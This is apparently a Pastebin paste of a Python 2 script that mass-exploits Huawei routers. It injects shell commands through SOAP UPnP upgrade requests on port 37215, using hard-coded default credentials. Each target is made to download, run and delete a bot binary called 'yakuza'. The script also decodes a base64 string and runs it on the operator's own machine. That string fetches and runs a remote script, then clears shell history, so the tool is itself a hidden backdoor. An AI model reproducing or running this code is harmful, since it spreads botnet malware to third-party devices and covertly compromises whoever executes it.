Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! python !#
- import threading, sys, time, random, socket, re, os, struct, array, requests, base64, subprocess
- from threading import Thread
- from time import sleep
- import requests
- from requests.auth import HTTPDigestAuth
- from decimal import *
- ips = open(sys.argv[1], "r").readlines()
- cmd1 = "/bin/busybox wget -g servip -l /tmp/yakuza -r /yakuza"
- cmd2 = "chmod 777 /tmp/elf;/tmp/yakuza; rm -rf /tmp/yakuza"
- payload1 = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(" + cmd1 + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
- payload2 = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(" + cmd2 + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
- class rtek(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- try:
- print "[Huawei] Loading - " + self.ip
- url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
- requests.post(url, timeout=3, data=payload1, auth=HTTPDigestAuth('dslf-config', 'admin'))
- requests.post(url, timeout=2.5, data=payload2, auth=HTTPDigestAuth('dslf-config', 'admin'))
- except Exception as e:
- pass
- def login(cmd):
- subprocess.call(cmd, shell=True)
- telpload = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvTHE5UDlDZzUgLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
- huaweiz = str(base64.b64decode(telpload))
- login(huaweiz)
- for ip in ips:
- try:
- n = rtek(ip)
- n.start()
- time.sleep(0.03)
- except:
- pass
Add Comment
Please, Sign In to add comment